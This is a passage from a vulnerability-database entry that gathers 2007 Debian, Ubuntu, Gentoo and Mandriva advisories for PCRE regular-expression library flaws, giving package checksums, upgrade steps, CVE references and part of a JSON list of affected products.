    http://security.debian.org/pool/updates/main/p/pcre3/libpcre3-dev_4.5+7.4-1_s390.deb Size/MD5 checksum: 207600 67a6569168be876d2b277ab39741c8a8 http://security.debian.org/pool/updates/main/p/pcre3/pcregrep_4.5+7.4-1_s390.deb Size/MD5 checksum: 20146 9d444e72c0d2c5801dd73fc615fdf21b http://security.debian.org/pool/updates/main/p/pcre3/libpcre3_4.5+7.4-1_s390.deb Size/MD5 checksum: 186128 fcf344c6fe92b16fac749d20c31e27b2

    sparc architecture (Sun SPARC/UltraSPARC)

    http://security.debian.org/pool/updates/main/p/pcre3/libpcre3_4.5+7.4-1_sparc.deb Size/MD5 checksum: 182522 056c33ca98c1af1872554f11890a8aad http://security.debian.org/pool/updates/main/p/pcre3/libpcre3-dev_4.5+7.4-1_sparc.deb Size/MD5 checksum: 206190 f03644175e2850034f6808f0d1474128 http://security.debian.org/pool/updates/main/p/pcre3/pcregrep_4.5+7.4-1_sparc.deb Size/MD5 checksum: 19582 6ff7847326eb7d43bd47e889b4a41b19

    Debian GNU/Linux 4.0 alias etch


    Source archives:

    http://security.debian.org/pool/updates/main/p/pcre3/pcre3_6.7+7.4-2.diff.gz Size/MD5 checksum: 79078 1894a9a0dbab52b63d7e1a28f37ab6c6 http://security.debian.org/pool/updates/main/p/pcre3/pcre3_6.7+7.4-2.dsc Size/MD5 checksum: 888 4db4d7a4b61dada63242d7a95eaec294 http://security.debian.org/pool/updates/main/p/pcre3/pcre3_6.7+7.4.orig.tar.gz Size/MD5 checksum: 1106897 de886b22cddc8eaf620a421d3041ee0b

    alpha architecture (DEC Alpha)

    http://security.debian.org/pool/updates/main/p/pcre3/libpcrecpp0_6.7+7.4-2_alpha.deb Size/MD5 checksum: 90652 e33f31b71bfc1786479d5de48b920276 http://security.debian.org/pool/updates/main/p/pcre3/libpcre3-dev_6.7+7.4-2_alpha.deb Size/MD5 checksum: 265062 0b62fa0afb187330894b04961325471f http://security.debian.org/pool/updates/main/p/pcre3/pcregrep_6.7+7.4-2_alpha.deb Size/MD5 checksum: 21038 a7c378c89d6f69a5f04902b6a45a2a6d http://security.debian.org/pool/updates/main/p/pcre3/libpcre3_6.7+7.4-2_alpha.deb Size/MD5 checksum: 209104 52e7e3c9a756535f6f02dd07df1d276e

    amd64 architecture (AMD x86_64 (AMD64))

    http://security.debian.org/pool/updates/main/p/pcre3/libpcrecpp0_6.7+7.4-2_amd64.deb Size/MD5 checksum: 89822 b617645e94ca5269c1c757c7eb0a03bb http://security.debian.org/pool/updates/main/p/pcre3/pcregrep_6.7+7.4-2_amd64.deb Size/MD5 checksum: 20156 cf3f0d1a30d10a64c3f8067d5c8b98ad http://security.debian.org/pool/updates/main/p/pcre3/libpcre3_6.7+7.4-2_amd64.deb Size/MD5 checksum: 198372 f0b2e646431302b576e0de6f4e4cbd0c http://security.debian.org/pool/updates/main/p/pcre3/libpcre3-dev_6.7+7.4-2_amd64.deb Size/MD5 checksum: 249792 cfcc6c71907b4aafd1f050569f413d2c

    arm architecture (ARM)

    http://security.debian.org/pool/updates/main/p/pcre3/libpcrecpp0_6.7+7.4-2_arm.deb Size/MD5 checksum: 88786 70d5ed4db2b37df871483e236430bfd9 http://security.debian.org/pool/updates/main/p/pcre3/libpcre3_6.7+7.4-2_arm.deb Size/MD5 checksum: 198022 c10252b7cc4cb6f603efc21e20f6172f http://security.debian.org/pool/updates/main/p/pcre3/libpcre3-dev_6.7+7.4-2_arm.deb Size/MD5 checksum: 243784 3a34b552827049e989be0361faf88078 http://security.debian.org/pool/updates/main/p/pcre3/pcregrep_6.7+7.4-2_arm.deb Size/MD5 checksum: 19920 9bd0dafb9121bb40fa2e556b8cc27c11

    hppa architecture (HP PA RISC)

    http://security.debian.org/pool/updates/main/p/pcre3/libpcre3-dev_6.7+7.4-2_hppa.deb Size/MD5 checksum: 256874 aad214ff1157b3354c20348eb00e08ea http://security.debian.org/pool/updates/main/p/pcre3/libpcrecpp0_6.7+7.4-2_hppa.deb Size/MD5 checksum: 92136 7f4b7cbfd19c837fa2e412d289ab662c http://security.debian.org/pool/updates/main/p/pcre3/pcregrep_6.7+7.4-2_hppa.deb Size/MD5 checksum: 20726 c759b1d33dd8ea8811c96ac9664c6242 http://security.debian.org/pool/updates/main/p/pcre3/libpcre3_6.7+7.4-2_hppa.deb Size/MD5 checksum: 201700 c307db03fcc9d8e2cc1becd15e6458f6

    i386 architecture (Intel ia32)

    http://security.debian.org/pool/updates/main/p/pcre3/libpcre3-dev_6.7+7.4-2_i386.deb Size/MD5 checksum: 246578 6fc5148f6848d4b90041a9d3d738779a http://security.debian.org/pool/updates/main/p/pcre3/libpcrecpp0_6.7+7.4-2_i386.deb Size/MD5 checksum: 89706 d59cc3cc167b6d81c18bd13ded830fa6 http://security.debian.org/pool/updates/main/p/pcre3/libpcre3_6.7+7.4-2_i386.deb Size/MD5 checksum: 197590 6f37a0e51e7fa6dc315f70a8f4347074 http://security.debian.org/pool/updates/main/p/pcre3/pcregrep_6.7+7.4-2_i386.deb Size/MD5 checksum: 19348 2cb19f81e576321be69962a29ffdfa60

    ia64 architecture (Intel ia64)

    http://security.debian.org/pool/updates/main/p/pcre3/pcregrep_6.7+7.4-2_ia64.deb Size/MD5 checksum: 25654 5d93dd5f45f5ba92e97d7ce1891b7800 http://security.debian.org/pool/updates/main/p/pcre3/libpcre3_6.7+7.4-2_ia64.deb Size/MD5 checksum: 230480 5853d6946a21a1404402371ba000e010 http://security.debian.org/pool/updates/main/p/pcre3/libpcrecpp0_6.7+7.4-2_ia64.deb Size/MD5 checksum: 93672 51714934316405999636b65a65a06bbe http://security.debian.org/pool/updates/main/p/pcre3/libpcre3-dev_6.7+7.4-2_ia64.deb Size/MD5 checksum: 280418 fb98335f69702d3fed96449fbee41eee

    mips architecture (MIPS (Big Endian))

    http://security.debian.org/pool/updates/main/p/pcre3/pcregrep_6.7+7.4-2_mips.deb Size/MD5 checksum: 20416 01c7d89a278c432b86ab97f9b1ac96a8 http://security.debian.org/pool/updates/main/p/pcre3/libpcre3-dev_6.7+7.4-2_mips.deb Size/MD5 checksum: 253406 7ad6c3ca69bcf480ae9d1b9199d88699 http://security.debian.org/pool/updates/main/p/pcre3/libpcre3_6.7+7.4-2_mips.deb Size/MD5 checksum: 197750 17619a85539b72c20884a68e6c4c313f http://security.debian.org/pool/updates/main/p/pcre3/libpcrecpp0_6.7+7.4-2_mips.deb Size/MD5 checksum: 90378 288ca9b0d5b3a599cdbe7703fc4880c1

    mipsel architecture (MIPS (Little Endian))

    http://security.debian.org/pool/updates/main/p/pcre3/libpcre3-dev_6.7+7.4-2_mipsel.deb Size/MD5 checksum: 252222 12c6750dcd7ed0bcfd947083981367a2 http://security.debian.org/pool/updates/main/p/pcre3/libpcrecpp0_6.7+7.4-2_mipsel.deb Size/MD5 checksum: 90350 aee7bd92b0cffd904cd4773b38396859 http://security.debian.org/pool/updates/main/p/pcre3/libpcre3_6.7+7.4-2_mipsel.deb Size/MD5 checksum: 197412 d80633436080fed5611bb7403e9ba06f http://security.debian.org/pool/updates/main/p/pcre3/pcregrep_6.7+7.4-2_mipsel.deb Size/MD5 checksum: 20454 d5bfe0b06780f9286eea54d184652ab4

    powerpc architecture (PowerPC)

    http://security.debian.org/pool/updates/main/p/pcre3/pcregrep_6.7+7.4-2_powerpc.deb Size/MD5 checksum: 21268 27714c1940a36759ce00479802eb1e79 http://security.debian.org/pool/updates/main/p/pcre3/libpcre3_6.7+7.4-2_powerpc.deb Size/MD5 checksum: 197508 0eb430eb3d93bd269e1bd039553fe2f1 http://security.debian.org/pool/updates/main/p/pcre3/libpcre3-dev_6.7+7.4-2_powerpc.deb Size/MD5 checksum: 252890 ef3bd238d7bc96f98a6e2b7e1b4fd4c3 http://security.debian.org/pool/updates/main/p/pcre3/libpcrecpp0_6.7+7.4-2_powerpc.deb Size/MD5 checksum: 91972 1631a4484913482d0095921279ecbb02

    s390 architecture (IBM S/390)

    http://security.debian.org/pool/updates/main/p/pcre3/pcregrep_6.7+7.4-2_s390.deb Size/MD5 checksum: 20096 2470ee4920d007e89006c29f6657995d http://security.debian.org/pool/updates/main/p/pcre3/libpcre3-dev_6.7+7.4-2_s390.deb Size/MD5 checksum: 248408 12cc9fed15c7df3927cf2b1a67e7d932 http://security.debian.org/pool/updates/main/p/pcre3/libpcrecpp0_6.7+7.4-2_s390.deb Size/MD5 checksum: 90404 393b5a20b3ff3994fa67b54d655a1580 http://security.debian.org/pool/updates/main/p/pcre3/libpcre3_6.7+7.4-2_s390.deb Size/MD5 checksum: 199852 41c608c3b77965984baf8369fc195e1a

    sparc architecture (Sun SPARC/UltraSPARC)

    http://security.debian.org/pool/updates/main/p/pcre3/pcregrep_6.7+7.4-2_sparc.deb Size/MD5 checksum: 19410 7fbb3350f740710b851a0559b0dd037b http://security.debian.org/pool/updates/main/p/pcre3/libpcre3_6.7+7.4-2_sparc.deb Size/MD5 checksum: 197518 d0665f02b329c6d61715e2a35205d014 http://security.debian.org/pool/updates/main/p/pcre3/libpcre3-dev_6.7+7.4-2_sparc.deb Size/MD5 checksum: 247038 10cace98a25999d4a8cf15536a7e95f6 http://security.debian.org/pool/updates/main/p/pcre3/libpcrecpp0_6.7+7.4-2_sparc.deb Size/MD5 checksum: 88598 09bb6fa7dd8ebf1d3a18b46be0e398d4

    These files will probably be moved into the stable distribution on its next update.


    For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce@lists.debian.org Package info: `apt-cache show ' and http://packages.debian.org/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux)

    iD8DBQFHL1oIXm3vHE4uyloRAst9AJ9IYwptSQJseS8EhIFA0AlapSqwhACgwkTF ts06dbP/9f/Sc2fR26Y2NMc= =iaWe -----END PGP SIGNATURE----- . =========================================================== Ubuntu Security Notice USN-547-1 November 27, 2007 pcre3 vulnerabilities CVE-2007-1659, CVE-2007-1660, CVE-2007-1661, CVE-2007-1662, CVE-2007-4766, CVE-2007-4767, CVE-2007-4768 ===========================================================

    A security issue affects the following Ubuntu releases:

    Ubuntu 6.06 LTS Ubuntu 6.10 Ubuntu 7.04 Ubuntu 7.10

    This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu.

    The problem can be corrected by upgrading your system to the following package versions:

    Ubuntu 6.06 LTS: libpcre3 7.4-0ubuntu0.6.06.1 libpcrecpp0 7.4-0ubuntu0.6.06.1

    Ubuntu 6.10: libpcre3 7.4-0ubuntu0.6.10.1 libpcrecpp0 7.4-0ubuntu0.6.10.1

    Ubuntu 7.04: libpcre3 7.4-0ubuntu0.7.04.1 libpcrecpp0 7.4-0ubuntu0.7.04.1

    Ubuntu 7.10: libpcre3 7.4-0ubuntu0.7.10.1 libpcrecpp0 7.4-0ubuntu0.7.10.1

    After a standard system upgrade you need to reboot your computer to effect the necessary changes.

    Due to the large internal code changes needed to solve outstanding flaws, it was not possible to backport all the upstream security fixes to the earlier released versions.

    Details follow:

    Tavis Ormandy and Will Drewry discovered multiple flaws in the regular expression handling of PCRE. He reported an error when processing "\Q\E" sequences with unmatched "\E" codes that can lead to the compiled bytecode being corrupted (CVE-2007-1659). Further improper calculations of memory boundaries were reported when matching certain input bytes against regex patterns in non UTF-8 mode (CVE-2007-1661) and when searching for unmatched brackets or parentheses (CVE-2007-1662). PCRE does not properly handle "\P" and "\P{x}" sequences which can lead to heap-based buffer overflows or trigger the execution of infinite loops (CVE-2007-4767), PCRE is also prone to an error when optimizing character classes containing a singleton UTF-8 sequence which might lead to a heap-based buffer overflow (CVE-2007-4768).

    Chris Evans also reported multiple integer overflow vulnerabilities in PCRE when processing a large number of named subpatterns ("name_count") or long subpattern names ("max_name_size") (CVE-2006-7227), and via large "min", "max", or "duplength" values (CVE-2006-7228) both possibly leading to buffer overflows. Another vulnerability was reported when compiling patterns where the "-x" or "-i" UTF-8 options change within the pattern, which might lead to improper memory calculations (CVE-2006-7230).

    Workaround

    There is no known workaround at this time.

    Resolution

    All PCRE users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=dev-libs/libpcre-7.3-r1"
    

    References

    [ 1 ] CVE-2006-7227 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-7227 [ 2 ] CVE-2006-7228 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-7228 [ 3 ] CVE-2006-7230 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-7230 [ 4 ] CVE-2007-1659 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1659 [ 5 ] CVE-2007-1660 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1660 [ 6 ] CVE-2007-1661 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1661 [ 7 ] CVE-2007-1662 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1662 [ 8 ] CVE-2007-4766 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4766 [ 9 ] CVE-2007-4767 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4767 [ 10 ] CVE-2007-4768 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4768

    Availability

    This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

    http://security.gentoo.org/glsa/glsa-200711-30.xml

    Concerns?

    Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org.

    License

    Copyright 2007 Gentoo Foundation, Inc; referenced text belongs to its owner(s).

    The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. This update ensures that kazehakase uses that supported library, and not its own embedded and insecure version.

    We recommend that you upgrade your kazehakase package.

    Updated packages have been patched to prevent this issue.


    References:

    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1659 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1660 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1661 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1662 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4766 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4767 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4768


    Updated Packages:

    Mandriva Linux 2007.1: e3eadb5dc3ae91ffc735a0021bb4c3b8 2007.1/i586/libpcre-devel-7.3-0.1mdv2007.1.i586.rpm 8eee92b33ed6f6be95cae33249242dfa 2007.1/i586/libpcre0-7.3-0.1mdv2007.1.i586.rpm 42e1ac0e8188b5f142e645c1ff6bb44d 2007.1/i586/pcre-7.3-0.1mdv2007.1.i586.rpm a03dca7708aa437655a393b0fe66f3c0 2007.1/SRPMS/pcre-7.3-0.1mdv2007.1.src.rpm

    Mandriva Linux 2007.1/X86_64: 370f8de2c9166883cbbcb2968b0575ec 2007.1/x86_64/lib64pcre-devel-7.3-0.1mdv2007.1.x86_64.rpm 306b2a144a25e1025d4ed02f3878b9dc 2007.1/x86_64/lib64pcre0-7.3-0.1mdv2007.1.x86_64.rpm 29b00561151987446eaaa3f0aaac5684 2007.1/x86_64/pcre-7.3-0.1mdv2007.1.x86_64.rpm a03dca7708aa437655a393b0fe66f3c0 2007.1/SRPMS/pcre-7.3-0.1mdv2007.1.src.rpm


    To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you.

    All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing:

    gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

    You can view other update advisories for Mandriva Linux at:

    http://www.mandriva.com/security/advisories

    If you want to report vulnerabilities, please contact

    security_(at)_mandriva.com


    Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.7 (GNU/Linux)

    iD8DBQFHM08lmqjQ0CJFipgRAvYTAKC+/5/D4RgCUnWInSK3iWw02iIZhACgliaH go5yp5LfVMY1jIk+EpEQgy0= =vGOF -----END PGP SIGNATURE-----

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-200711-0560",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "mac os x server",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "apple",
            "version": "10.4.11"
          },
          {
            "model": "perl-compatible regular expression library",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "pcre",
            "version": "7.1"
          },
          {
            "model": "mac os x",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "apple",
            "version": "10.4.11"
          },
          {
            "model": "perl-compatible regular expression library",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "pcre",
            "version": "7.2"
          },
          {
            "model": "perl-compatible regular expression library",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "pcre",
            "version": "7.0"
          },
          {
            "model": "mac os x",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "apple",
            "version": "v10.5.2"
          },
          {
            "model": "mac os x server",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "apple",
            "version": "v10.4.11"
          },
          {
            "model": "pcre",
            "scope": "lt",
            "trust": 0.8,
            "vendor": "pcre",
            "version": "version"
          },
          {
            "model": "mac os x",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "apple",
            "version": "v10.4.11"
          },
          {
            "model": "mac os x server",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "apple",
            "version": "v10.5.2"
          },
          {
            "model": "pcre",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "pcre",
            "version": "7.3"
          },
          {
            "model": "perl-compatible regular expression library",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "pcre",
            "version": "7.2"
          },
          {
            "model": "www-client/kazehakase",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "gentoo",
            "version": "0.4.9"
          },
          {
            "model": "acrobat standard",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "7.0.1"
          },
          {
            "model": "linux mandrake x86 64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandriva",
            "version": "2007.0"
          },
          {
            "model": "acrobat professional",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "7.0.3"
          },
          {
            "model": "pcre",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "pcre",
            "version": "4.4"
          },
          {
            "model": "linux ppc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "3.1"
          },
          {
            "model": "reader",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "7.0.6"
          },
          {
            "model": "acrobat 3d",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "0"
          },
          {
            "model": "acrobat standard",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "8.0"
          },
          {
            "model": "opensuse",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "10.3"
          },
          {
            "model": "multi network firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandrakesoft",
            "version": "2.0"
          },
          {
            "model": "pcre",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "pcre",
            "version": "6.0"
          },
          {
            "model": "enterprise linux ws",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "2.1"
          },
          {
            "model": "x11-libs/goffice",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "gentoo",
            "version": "0.6"
          },
          {
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "rpath",
            "version": "1"
          },
          {
            "model": "corporate server x86 64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandrakesoft",
            "version": "4.0"
          },
          {
            "model": "foundation r",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "r",
            "version": "2.2.1"
          },
          {
            "model": "linux lts powerpc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "6.06"
          },
          {
            "model": "linux i386",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "6.10"
          },
          {
            "model": "www-client/kazehakase",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "gentoo",
            "version": "0.5"
          },
          {
            "model": "acrobat standard",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "7.0.8"
          },
          {
            "model": "messaging storage server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "3.1"
          },
          {
            "model": "reader",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "7.0"
          },
          {
            "model": "acrobat professional",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "7.0.4"
          },
          {
            "model": "ccs",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "3.1.2"
          },
          {
            "model": "enterprise linux es",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "4"
          },
          {
            "model": "enterprise linux es",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "3"
          },
          {
            "model": "enterprise linux desktop version",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "4"
          },
          {
            "model": "linux sparc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "7.04"
          },
          {
            "model": "ccs",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "3.1.1"
          },
          {
            "model": "communication manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "4.0"
          },
          {
            "model": "linux mandrake x86 64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandriva",
            "version": "2007.1"
          },
          {
            "model": "reader",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "7.0.1"
          },
          {
            "model": "acrobat professional",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "8.1"
          },
          {
            "model": "linux m68k",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "3.1"
          },
          {
            "model": "reader",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "8.1.2"
          },
          {
            "model": "solaris",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "10.0"
          },
          {
            "model": "advanced workstation for the itanium processor",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "2.1"
          },
          {
            "model": "reader",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "8.0"
          },
          {
            "model": "acrobat professional",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "7.1"
          },
          {
            "model": "linux ia-64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "3.1"
          },
          {
            "model": "enterprise linux desktop client",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "5"
          },
          {
            "model": "linux powerpc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "7.04"
          },
          {
            "model": "mac os server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.4.11"
          },
          {
            "model": "acrobat standard",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "7.0.2"
          },
          {
            "model": "linux sparc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "3.1"
          },
          {
            "model": "x11-libs/goffice",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "gentoo",
            "version": "0.6.1"
          },
          {
            "model": "enterprise linux ws ia64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "2.1"
          },
          {
            "model": "networks media processing svr rel",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "10003.0"
          },
          {
            "model": "linux foresight linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "foresight",
            "version": "1.1"
          },
          {
            "model": "acrobat standard",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "7.0.3"
          },
          {
            "model": "acrobat standard",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "8.1.2"
          },
          {
            "model": "linux hppa",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "3.1"
          },
          {
            "model": "linux lts i386",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "6.06"
          },
          {
            "model": "acrobat professional",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "7.0.6"
          },
          {
            "model": "acrobat professional",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "7.0.7"
          },
          {
            "model": "messaging storage server mm3.0",
            "scope": null,
            "trust": 0.3,
            "vendor": "avaya",
            "version": null
          },
          {
            "model": "opensolaris build snv 88",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "model": "linux amd64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "4.0"
          },
          {
            "model": "pcre",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "pcre",
            "version": "6.2"
          },
          {
            "model": "linux amd64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "6.10"
          },
          {
            "model": "pcre",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "pcre",
            "version": "3.9"
          },
          {
            "model": "linux sparc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "6.10"
          },
          {
            "model": "reader",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "7.0.8"
          },
          {
            "model": "linux lts amd64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "6.06"
          },
          {
            "model": "kazehakase",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "kazehakase",
            "version": "0.4.2"
          },
          {
            "model": "linux mandrake",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandriva",
            "version": "2007.1"
          },
          {
            "model": "linux powerpc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "6.10"
          },
          {
            "model": "linux alpha",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "4.0"
          },
          {
            "model": "enterprise linux es",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "2.1"
          },
          {
            "model": "linux ia-32",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "4.0"
          },
          {
            "model": "pcre",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "pcre",
            "version": "6.1"
          },
          {
            "model": "linux mipsel",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "4.0"
          },
          {
            "model": "linux mips",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "4.0"
          },
          {
            "model": "acrobat standard",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "7.0.4"
          },
          {
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "3.1"
          },
          {
            "model": "acrobat professional",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "7.0.5"
          },
          {
            "model": "desktop",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "4.0"
          },
          {
            "model": "pcre",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "pcre",
            "version": "3.7"
          },
          {
            "model": "reader",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "7.0.2"
          },
          {
            "model": "mac os server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.5.2"
          },
          {
